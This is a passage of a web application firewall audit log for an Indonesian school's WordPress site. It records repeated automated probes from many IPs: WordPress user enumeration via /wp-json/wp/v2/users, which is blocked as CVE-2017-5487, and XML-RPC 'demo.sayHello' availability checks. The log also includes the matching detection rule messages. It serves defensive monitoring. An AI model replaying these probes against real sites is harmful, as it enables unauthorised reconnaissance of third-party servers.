"210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461419437239 6266 (- - -) Stopwatch2: 1746461419437239 6266; combined=4832, p1=587, p2=4000, p3=40, p4=42, p5=97, sr=78, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b02c6758-Z-- --0c602535-A-- [05/May/2025:23:10:27 +0700] aBji8wRwKNFSM6B7_LagtwAAAII 103.236.140.4 47912 103.236.140.4 8181 --0c602535-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0c602535-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c602535-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461427902908 3344 (- - -) Stopwatch2: 1746461427902908 3344; combined=1529, p1=515, p2=971, p3=0, p4=0, p5=43, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c602535-Z-- --5a286555-A-- [05/May/2025:23:10:29 +0700] aBji9YZWvR7-42f6JrANTgAAAM4 103.236.140.4 47918 103.236.140.4 8181 --5a286555-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5a286555-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a286555-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461429120858 2875 (- - -) Stopwatch2: 1746461429120858 2875; combined=1414, p1=485, p2=898, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a286555-Z-- --50ec5c78-A-- [05/May/2025:23:10:30 +0700] aBji9vZJDMuQndL03JNdOAAAAEQ 103.236.140.4 47948 103.236.140.4 8181 --50ec5c78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --50ec5c78-C-- demo.sayHello --50ec5c78-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --50ec5c78-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461430680050 5169 (- - -) Stopwatch2: 1746461430680050 5169; combined=4056, p1=510, p2=3327, p3=31, p4=34, p5=91, sr=87, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50ec5c78-Z-- --2f91bd7b-A-- [05/May/2025:23:10:31 +0700] aBji94ZWvR7-42f6JrANUwAAAMw 103.236.140.4 47954 103.236.140.4 8181 --2f91bd7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.242 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f91bd7b-C-- demo.sayHello --2f91bd7b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f91bd7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461431910404 4834 (- - -) Stopwatch2: 1746461431910404 4834; combined=3728, p1=455, p2=3070, p3=28, p4=27, p5=87, sr=74, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f91bd7b-Z-- --1fb6c65f-A-- [05/May/2025:23:10:35 +0700] aBji-4ZWvR7-42f6JrANXQAAAMs 103.236.140.4 48000 103.236.140.4 8181 --1fb6c65f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1fb6c65f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fb6c65f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461435177389 3360 (- - -) Stopwatch2: 1746461435177389 3360; combined=1419, p1=477, p2=900, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fb6c65f-Z-- --dd5e1c0c-A-- [05/May/2025:23:10:39 +0700] aBji_4ZWvR7-42f6JrANaAAAANg 103.236.140.4 48044 103.236.140.4 8181 --dd5e1c0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dd5e1c0c-C-- demo.sayHello --dd5e1c0c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd5e1c0c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461439497218 6696 (- - -) Stopwatch2: 1746461439497218 6696; combined=4847, p1=592, p2=4007, p3=39, p4=43, p5=99, sr=77, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd5e1c0c-Z-- --63829614-A-- [05/May/2025:23:10:43 +0700] aBjjA4ZWvR7-42f6JrANcgAAANc 103.236.140.4 48080 103.236.140.4 8181 --63829614-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63829614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63829614-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461443974487 3443 (- - -) Stopwatch2: 1746461443974487 3443; combined=1509, p1=530, p2=942, p3=0, p4=0, p5=37, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63829614-Z-- --7a72ab24-A-- [05/May/2025:23:10:46 +0700] aBjjBoZWvR7-42f6JrANeAAAAMo 103.236.140.4 48104 103.236.140.4 8181 --7a72ab24-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.232 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7a72ab24-C-- demo.sayHello --7a72ab24-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a72ab24-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461446775011 5574 (- - -) Stopwatch2: 1746461446775011 5574; combined=4377, p1=570, p2=3560, p3=32, p4=35, p5=104, sr=146, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a72ab24-Z-- --5a151714-A-- [05/May/2025:23:10:52 +0700] aBjjDIZWvR7-42f6JrANfwAAAMI 103.236.140.4 48152 103.236.140.4 8181 --5a151714-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5a151714-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a151714-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461452806354 3131 (- - -) Stopwatch2: 1746461452806354 3131; combined=1401, p1=464, p2=905, p3=0, p4=0, p5=31, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a151714-Z-- --7418512b-A-- [05/May/2025:23:10:56 +0700] aBjjEIZWvR7-42f6JrANhQAAAMU 103.236.140.4 48184 103.236.140.4 8181 --7418512b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.215 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7418512b-C-- demo.sayHello --7418512b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7418512b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461456155699 5295 (- - -) Stopwatch2: 1746461456155699 5295; combined=4044, p1=606, p2=3237, p3=34, p4=37, p5=77, sr=76, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7418512b-Z-- --68d5bb48-A-- [05/May/2025:23:11:04 +0700] aBjjGARwKNFSM6B7_LagyQAAAJU 103.236.140.4 48258 103.236.140.4 8181 --68d5bb48-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --68d5bb48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68d5bb48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461464327147 2176 (- - -) Stopwatch2: 1746461464327147 2176; combined=1223, p1=413, p2=779, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68d5bb48-Z-- --a5cb977c-A-- [05/May/2025:23:11:07 +0700] aBjjGwRwKNFSM6B7_LagywAAAJc 103.236.140.4 48290 103.236.140.4 8181 --a5cb977c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a5cb977c-C-- demo.sayHello --a5cb977c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5cb977c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461467119735 5331 (- - -) Stopwatch2: 1746461467119735 5331; combined=4154, p1=516, p2=3425, p3=35, p4=38, p5=83, sr=62, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5cb977c-Z-- --fa452d51-A-- [05/May/2025:23:11:29 +0700] aBjjMU2V_h1VFAgsfgZ9kgAAABM 103.236.140.4 48504 103.236.140.4 8181 --fa452d51-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fa452d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa452d51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461489915898 3298 (- - -) Stopwatch2: 1746461489915898 3298; combined=1481, p1=513, p2=924, p3=0, p4=0, p5=43, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa452d51-Z-- --abdc876b-A-- [05/May/2025:23:11:32 +0700] aBjjNPZJDMuQndL03JNdSgAAAEk 103.236.140.4 48528 103.236.140.4 8181 --abdc876b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --abdc876b-C-- demo.sayHello --abdc876b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --abdc876b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461492660974 5268 (- - -) Stopwatch2: 1746461492660974 5268; combined=4265, p1=537, p2=3507, p3=32, p4=35, p5=92, sr=89, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abdc876b-Z-- --e829511f-A-- [05/May/2025:23:11:34 +0700] aBjjNk2V_h1VFAgsfgZ9lgAAABQ 103.236.140.4 48548 103.236.140.4 8181 --e829511f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e829511f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e829511f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461494285978 2772 (- - -) Stopwatch2: 1746461494285978 2772; combined=1290, p1=433, p2=827, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e829511f-Z-- --75840407-A-- [05/May/2025:23:11:38 +0700] aBjjOoZWvR7-42f6JrANtAAAANU 103.236.140.4 48584 103.236.140.4 8181 --75840407-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --75840407-C-- demo.sayHello --75840407-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --75840407-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461498150604 6079 (- - -) Stopwatch2: 1746461498150604 6079; combined=4729, p1=608, p2=3873, p3=43, p4=45, p5=96, sr=76, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
